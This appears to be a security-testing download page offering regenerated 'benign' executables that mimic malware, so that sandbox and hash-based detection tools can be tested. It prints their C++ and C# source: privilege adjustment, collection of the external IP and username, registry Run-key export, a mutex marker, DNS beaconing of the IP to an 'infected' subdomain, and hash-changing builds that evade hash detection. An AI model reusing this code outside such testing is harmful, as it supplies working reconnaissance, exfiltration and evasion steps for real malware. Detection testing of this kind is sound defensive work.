Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Test your deployment, 1 click proves that the integrations are talking together
* Use over HTTPs to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
malware_eicar_cpayne_1731277930.exe | 150aa910e9a6c23905ba398c7a66f5be | November 10 2024 22:32:11 GMT | 4775532 bytes |
malware_eicar_cpayne_1731246841.exe | 7d034c77e4b344d309238d4413909947 | November 10 2024 13:54:03 GMT | 4775532 bytes |
malware_eicar_cpayne_1731175427.exe | 879c2d5296fd5f9a5e559869b69d9930 | November 09 2024 18:03:48 GMT | 4775532 bytes |
malware_eicar_cpayne_1731162544.exe | 614f23dce52e4352c2d98f871d3c86f6 | November 09 2024 14:29:05 GMT | 4775532 bytes |
malware_eicar_cpayne_1731117537.exe | 6723449740b40f7129e8c55579b58787 | November 09 2024 01:58:58 GMT | 4775532 bytes |
malware_eicar_cpayne_1731069384.exe | aef68a49d1aafa1d7ba9fe7f7a46dbe7 | November 08 2024 12:36:25 GMT | 4775532 bytes |
malware_eicar_cpayne_1731051048.exe | c83dad4115416a08e731a082c8a15330 | November 08 2024 07:30:49 GMT | 4775532 bytes |
malware_eicar_cpayne_1730936427.exe | 24c0650a0f57f8b884c6755da0d4251b | November 06 2024 23:40:28 GMT | 4775532 bytes |
malware_eicar_cpayne_1730882787.exe | 5b654db45d7ca62b15e052134c9ef9b1 | November 06 2024 08:46:28 GMT | 4775532 bytes |
malware_eicar_cpayne_1730876408.exe | f138bec29a5d6e13a729310e1492b400 | November 06 2024 07:00:09 GMT | 4775532 bytes |
> #cat /path/malware_eicar.cs
/*
MAATrigger-Payload - John Payne
------------------------
Windows C++ executable - once executed it will perform the following,
closly matching original C# code. Targeted for Windows 7+ operating systems
What this code does:
- Gain privs to allow registry access
- Connects to bot.whatismyipaddress.com & and get IP
- Get current Windows user
- Write IP and Windows user to file (current DIR\drop.txt)
- Export registry keys to file (current DIR\export.reg)
- Create mutex "1234-7" - red flag in MAA
- Sleep for 60000ms
*/
#include
#include
#include "windows.h" // C++ Windows API
#include
#pragma comment(lib, "Ws2_32.lib") // winsock2 libary
using namespace std;
bool gainPriv();
int main() {
cout << "Blessings Payload Application\n";
/* Gain the neccessary priv's to perform admin functions on Windows
------------------------------------------------------------------*/
cout << "Escalating privileges if possible...\n";
if (gainPriv()) {
cout << "Privileges escalated successfully.\n";
}
else {
cout << "Could not escalate privileges. Likely running as locked down user with limited OS access, or other security mechanisms in place.\n";
}
/* located external IP address. Note very little error checking here
------------------------------------------------------------------ */
WSADATA wsaData;
sockaddr_in serverInfo;
char request[] = "GET / HTTP/1.0\r\nHost: bot.whatismyipaddress.com\r\nUser-Agent: Blessings\r\nConnection: Close\r\n\r\n";
char recvBuf[512] = "";
serverInfo.sin_family = AF_INET;
serverInfo.sin_addr.s_addr = inet_addr("66.171.248.178"); // bot.whatismyipaddress.com
serverInfo.sin_port = htons(80);
int err = WSAStartup(MAKEWORD(2,2), &wsaData);
int sockfd = ::socket(AF_INET, SOCK_STREAM, 0);
err = ::connect(sockfd, (SOCKADDR *)&serverInfo, sizeof(serverInfo));
err = ::send(sockfd, request, (int)strlen(request), 0);
// recv loop, server *Should* respect the Connection: close header so this can be kept simple
do {
err = recv(sockfd, recvBuf, 512, 0);
if (err > 0)
cout << "Recieved " << err << "OK.\n";
else if (err == 0)
cout << "Connection gracefully closed.\n";
else
cout << "Something went wrong with recv()\n";
} while (err > 0);
WSACleanup();
/* Get Windows Username
------------------------------------------------------------------*/
char currentUser[128];
DWORD userSize = 512;
int ret = GetUserNameA(currentUser, &userSize);
if (ret == 0) {
cout << "Error with username: " << GetLastError() << endl;
}
cout << "Current user is " << currentUser << endl;
/* Write IP and username to a file
------------------------------------------------------------------*/
ofstream outFile;
outFile.open("drop.txt", ios::out);
outFile << "Dropped by MAATrigger-Payload\nUsername: " << currentUser << endl;
outFile << "External IP: " << recvBuf << endl;
outFile.close();
/* perform registry query and export to current DIR\export.reg
------------------------------------------------------------------*/
REGSAM regAccess = KEY_READ;
HKEY keyResult;
LONG lresult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, regAccess, &keyResult);
if (lresult == ERROR_SUCCESS) {
cout << "Opened key OK.\n";
}
else {
cout << "Failed to open key.\n";
}
LONG saveResult = RegSaveKeyEx(keyResult, TEXT("export.reg"), NULL, REG_STANDARD_FORMAT);
if (saveResult == ERROR_SUCCESS) {
cout << "Saved keys OK.\n";
}
else {
cout << "Failed to save keys. Error " << saveResult << endl;
}
/* Create Windows Mutex
------------------------------------------------------------------*/
HANDLE mytex = CreateMutex(NULL, TRUE, "1234-7");
if (mytex == NULL) {
cout << "Error creating mutex.\n";
}
else {
cout << "Mutex created OK.\n";
}
ReleaseMutex(mytex);
/* perform sleep for 60 seconds
------------------------------------------------------------------*/
Sleep(60000);
// all done!
return 0;
}
bool gainPriv() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES newState;
LUID luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
cout << "Failed OpenProcessToken.\n";
return false;
}
if (!LookupPrivilegeValue(NULL, SE_BACKUP_NAME, &luid))
{
CloseHandle(hToken);
printf("Failed LookupPrivilegeValue\n");
return false;
}
newState.PrivilegeCount = 1;
newState.Privileges[0].Luid = luid;
newState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Adjust the token privilege.
if (!AdjustTokenPrivileges(hToken, FALSE, &newState, 0, NULL, NULL))
{
printf("Failed AdjustTokenPrivileges\n");
return false;
}
// Close the handle.
CloseHandle(hToken);
return true;
}
Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Test your deployment, 1 click proves that the integrations are talking together
* Use over HTTPs to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
malware_eicar_csharp_1731277934.exe | 50d149addbc25590f59d7bd365cbfdba | November 10 2024 22:32:15 GMT | 5120 bytes |
malware_eicar_csharp_1731200731.exe | 2cb62dfa484cb368ee51ff3c83fe16ed | November 10 2024 01:05:31 GMT | 5120 bytes |
malware_eicar_csharp_1731183394.exe | de31a71a7f2c96ae4cec50e8cf6fd032 | November 09 2024 20:16:34 GMT | 5120 bytes |
malware_eicar_csharp_1731144118.exe | 4ff8dfae14aae3659f3107e1c89182ba | November 09 2024 09:21:58 GMT | 5120 bytes |
malware_eicar_csharp_1731101813.exe | 02ae6d825839b1b8a18e8dc62bbf913e | November 08 2024 21:36:53 GMT | 5120 bytes |
malware_eicar_csharp_1731087641.exe | 07381ad8ce49c60d2efc708f4d6afa12 | November 08 2024 17:40:41 GMT | 5120 bytes |
malware_eicar_csharp_1730981747.exe | 570901e2cf9164c441bb9373abf3795b | November 07 2024 12:15:47 GMT | 5120 bytes |
malware_eicar_csharp_1730973761.exe | 9c7f6b5d8b98b20fb5e823269f8c343c | November 07 2024 10:02:41 GMT | 5120 bytes |
malware_eicar_csharp_1730966305.exe | 19b8d2964b9fc504b3fd27ef6e33cc38 | November 07 2024 07:58:26 GMT | 5120 bytes |
malware_eicar_csharp_1730965034.exe | 3769cd7cd5079f8e14d99a6fbcab47c6 | November 07 2024 07:37:14 GMT | 5120 bytes |
> #cat /path/malware_eicar.cs
using System;
using System.Net;
using System.Web;
using System.Text;
using System.Text.RegularExpressions;
using System.Diagnostics;
using System.ComponentModel;
namespace blessings.Mono.Eicar
{
public class HelloMalware
{
public static void Main(string[] args)
{
Console.Write("I'm up to no good");
Console.Write("dynamic=ffc89310d674302ab4c8745409994bf9"); //Hash derived from system clock to keep exe hash changing
WebClient webClient = new WebClient();
byte[] myIp = webClient.DownloadData("http://bot.whatismyipaddress.com/");
string[] output = new string[5];
output[0] = System.Text.Encoding.Default.GetString(myIp);
output[1] = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
System.IO.File.WriteAllLines(@"./scraped_info.txt",output) ;
System.IO.File.WriteAllText(@"./fake_rasauto32.dll",":)") ;
Export(@".\export.reg", @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
IPHostEntry hostInfo = Dns.GetHostEntry(output[0]+".infected.7blessings.co.uk");
System.Threading.Mutex _mutey = null;
_mutey = new System.Threading.Mutex(false, "1234-7");
Console.Write(System.Environment.NewLine+"Finished");
Console.ReadLine();
System.Threading.Thread.Sleep(60000);
}
private static void Export(string exportPath, string registryPath)
{
string path = "\""+ exportPath + "\"";
string key = "\""+ registryPath + "\"";
Process proc = new Process();
try
{
proc.StartInfo.FileName = "regedit.exe";
proc.StartInfo.UseShellExecute = false;
proc = Process.Start("regedit.exe", "/e " + path + " "+ key);
proc.WaitForExit();
}
catch (Exception)
{
proc.Dispose();
}
}
}
}
Many thanks to https://github.com/a0rtega/pafish for your work!
Generated 100% benign compiled exe that mimics behaviour actions of genuine malware. As the malware is generated frequently, the hash should already not be known to any security tool.
This tool differs from the above as it detonates in a Sandbox, and not the full iVM making it ideal for testing and showing MASS.
Download this file on the target computer and investigate in the security tools.
Hash based tools should not detect it.
Sandbox tools should detonate and detect.
If you have an inline realtime blocking tool, this file should not get delivered.
* Demonstrate the value of real time detonation vs hash based technologies.
* Demonstrate security delivere to devices using Cloud proxy
* Use over HTTPs to test decryption configurations
File | MD5 Hash | Created | Size |
---|---|---|---|
pafish_appendedepoch_1731293040.exe | 1df57aff5d11c2f5b844a84f200c696f | November 11 2024 02:44:00 GMT | 76811 bytes |
pafish_appendedepoch_1731277936.exe | 62668579893e45ed0319250de7a75788 | November 10 2024 22:32:16 GMT | 76811 bytes |
pafish_appendedepoch_1731250715.exe | 709acd914064c37a01a2eadfb84810e2 | November 10 2024 14:58:35 GMT | 76811 bytes |
pafish_appendedepoch_1731250713.exe | d6006f9bbdb50c28827abb2a68e4adfd | November 10 2024 14:58:33 GMT | 76811 bytes |
pafish_appendedepoch_1731206040.exe | 7576a9f9c7fc3e570d048c49d2b08188 | November 10 2024 02:34:00 GMT | 76811 bytes |
pafish_appendedepoch_1731204936.exe | c27b4cc5f788b08cc37d259117593f83 | November 10 2024 02:15:36 GMT | 76811 bytes |
pafish_appendedepoch_1731152191.exe | 0857c2562274c9796efe50c8aa2b3f09 | November 09 2024 11:36:31 GMT | 76811 bytes |
pafish_appendedepoch_1731113672.exe | 308017fb80cdf2f7ea432e0bf22bbf00 | November 09 2024 00:54:32 GMT | 76811 bytes |
pafish_appendedepoch_1731101875.exe | 6d7d0da6f19cb3898a5e2516b1f5bc45 | November 08 2024 21:37:55 GMT | 76811 bytes |
pafish_appendedepoch_1731052028.exe | 49113167a2e9d34eab3f69585698b0f8 | November 08 2024 07:47:08 GMT | 76811 bytes |